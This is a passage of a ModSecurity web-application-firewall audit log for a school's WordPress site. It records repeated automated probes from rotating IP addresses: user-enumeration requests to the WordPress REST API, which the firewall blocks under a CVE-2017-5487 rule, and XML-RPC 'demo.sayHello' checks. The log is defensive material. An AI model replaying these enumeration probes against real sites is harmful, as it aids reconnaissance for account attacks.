+0700] aCisiHyxdQCiyU1ENFed-AAAABY 103.236.140.4 32876 103.236.140.4 8181 --42f9610b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --42f9610b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42f9610b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496072881328 2795 (- - -) Stopwatch2: 1747496072881328 2795; combined=1246, p1=440, p2=778, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42f9610b-Z-- --5d9ff35c-A-- [17/May/2025:22:34:36 +0700] aCisjHyxdQCiyU1ENFeeAwAAABg 103.236.140.4 32928 103.236.140.4 8181 --5d9ff35c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5d9ff35c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d9ff35c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496076595448 3280 (- - -) Stopwatch2: 1747496076595448 3280; combined=1421, p1=481, p2=908, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d9ff35c-Z-- --0df31550-A-- [17/May/2025:22:34:42 +0700] aCisknyxdQCiyU1ENFeeBgAAAAY 103.236.140.4 32942 103.236.140.4 8181 --0df31550-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0df31550-C-- demo.sayHello --0df31550-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0df31550-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496082204924 5628 (- - -) Stopwatch2: 1747496082204924 5628; combined=4126, p1=560, p2=3325, p3=31, p4=36, p5=102, sr=89, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df31550-Z-- --5cb43048-A-- [17/May/2025:22:34:50 +0700] aCismum4kjNN-hEbWjKf0QAAAFg 103.236.140.4 33016 103.236.140.4 8181 --5cb43048-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cb43048-C-- demo.sayHello --5cb43048-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cb43048-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496090054460 5898 (- - -) Stopwatch2: 1747496090054460 5898; combined=4295, p1=576, p2=3497, p3=31, p4=34, p5=93, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cb43048-Z-- --9be4131d-A-- [17/May/2025:22:34:57 +0700] aCisoRKi5m5upc8uMd4VQAAAANU 103.236.140.4 33068 103.236.140.4 8181 --9be4131d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9be4131d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9be4131d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496097235740 2769 (- - -) Stopwatch2: 1747496097235740 2769; combined=1279, p1=416, p2=825, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9be4131d-Z-- --50eaf079-A-- [17/May/2025:22:35:05 +0700] aCisqQTOsBn9MSWb6WLQhgAAAIQ 103.236.140.4 33172 103.236.140.4 8181 --50eaf079-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50eaf079-C-- demo.sayHello --50eaf079-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50eaf079-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496105319809 4671 (- - -) Stopwatch2: 1747496105319809 4671; combined=3248, p1=508, p2=2565, p3=28, p4=30, p5=70, sr=58, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50eaf079-Z-- --0a000a67-A-- [17/May/2025:22:35:46 +0700] aCis0um4kjNN-hEbWjKf_gAAAFQ 103.236.140.4 33992 103.236.140.4 8181 --0a000a67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0a000a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a000a67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496146967927 2266 (- - -) Stopwatch2: 1747496146967927 2266; combined=1104, p1=415, p2=666, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a000a67-Z-- --e089270d-A-- [17/May/2025:22:35:52 +0700] aCis2ATOsBn9MSWb6WLQ0gAAAIQ 103.236.140.4 34104 103.236.140.4 8181 --e089270d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.137 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e089270d-C-- demo.sayHello --e089270d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e089270d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496152597193 5854 (- - -) Stopwatch2: 1747496152597193 5854; combined=4544, p1=564, p2=3734, p3=39, p4=43, p5=97, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e089270d-Z-- --a7ed3849-A-- [17/May/2025:22:36:23 +0700] aCis9xKi5m5upc8uMd4VlQAAANg 103.236.140.4 34658 103.236.140.4 8181 --a7ed3849-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7ed3849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7ed3849-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496183607703 2683 (- - -) Stopwatch2: 1747496183607703 2683; combined=1214, p1=411, p2=775, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7ed3849-Z-- --cb090444-A-- [17/May/2025:22:36:31 +0700] aCis_wTOsBn9MSWb6WLQ6AAAAJM 103.236.140.4 34780 103.236.140.4 8181 --cb090444-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb090444-C-- demo.sayHello --cb090444-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb090444-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496191071491 5397 (- - -) Stopwatch2: 1747496191071491 5397; combined=4009, p1=516, p2=3278, p3=38, p4=32, p5=86, sr=69, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb090444-Z-- --6156f43f-A-- [17/May/2025:22:37:01 +0700] aCitHRKi5m5upc8uMd4VvgAAAMk 103.236.140.4 35508 103.236.140.4 8181 --6156f43f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6156f43f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6156f43f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496221803229 2443 (- - -) Stopwatch2: 1747496221803229 2443; combined=1004, p1=349, p2=631, p3=0, p4=0, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6156f43f-Z-- --569b7a62-A-- [17/May/2025:22:37:07 +0700] aCitI-m4kjNN-hEbWjKgqAAAAFc 103.236.140.4 35610 103.236.140.4 8181 --569b7a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --569b7a62-C-- demo.sayHello --569b7a62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --569b7a62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496227744573 5396 (- - -) Stopwatch2: 1747496227744573 5396; combined=3957, p1=522, p2=3219, p3=33, p4=35, p5=88, sr=71, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --569b7a62-Z-- --ddce305b-A-- [17/May/2025:22:37:13 +0700] aCitKRKi5m5upc8uMd4VyAAAAMw 103.236.140.4 35704 103.236.140.4 8181 --ddce305b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ddce305b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddce305b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496233356225 2524 (- - -) Stopwatch2: 1747496233356225 2524; combined=1100, p1=376, p2=698, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddce305b-Z-- --f406176b-A-- [17/May/2025:22:37:13 +0700] aCitKRKi5m5upc8uMd4VyQAAANg 103.236.140.4 35706 103.236.140.4 8181 --f406176b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f406176b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f406176b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496233368219 1619 (- - -) Stopwatch2: 1747496233368219 1619; combined=818, p1=283, p2=512, p3=0, p4=0, p5=22, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f406176b-Z-- --86ae5555-A-- [17/May/2025:22:37:21 +0700] aCitMRKi5m5upc8uMd4V7AAAAMQ 103.236.140.4 35862 103.236.140.4 8181 --86ae5555-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86ae5555-C-- demo.sayHello --86ae5555-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86ae5555-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496241575734 5323 (- - -) Stopwatch2: 1747496241575734 5323; combined=4181, p1=543, p2=3404, p3=32, p4=35, p5=98, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86ae5555-Z-- --95925034-A-- [17/May/2025:22:37:22 +0700] aCitMnyxdQCiyU1ENFeezAAAABg 103.236.140.4 35888 103.236.140.4 8181 --95925034-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --95925034-C-- demo.sayHello --95925034-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --95925034-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496242953716 5678 (- - -) Stopwatch2: 1747496242953716 5678; combined=4214, p1=547, p2=3393, p3=31, p4=35, p5=119, sr=79, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95925034-Z-- --0dcbc903-A-- [17/May/2025:22:38:56 +0700] aCitkATOsBn9MSWb6WLRMgAAAJI 103.236.140.4 37910 103.236.140.4 8181 --0dcbc903-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0dcbc903-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dcbc903-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496336763789 2768 (- - -) Stopwatch2: 1747496336763789 2768; combined=1241, p1=440, p2=770, p3=0, p4=0, p5=30, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 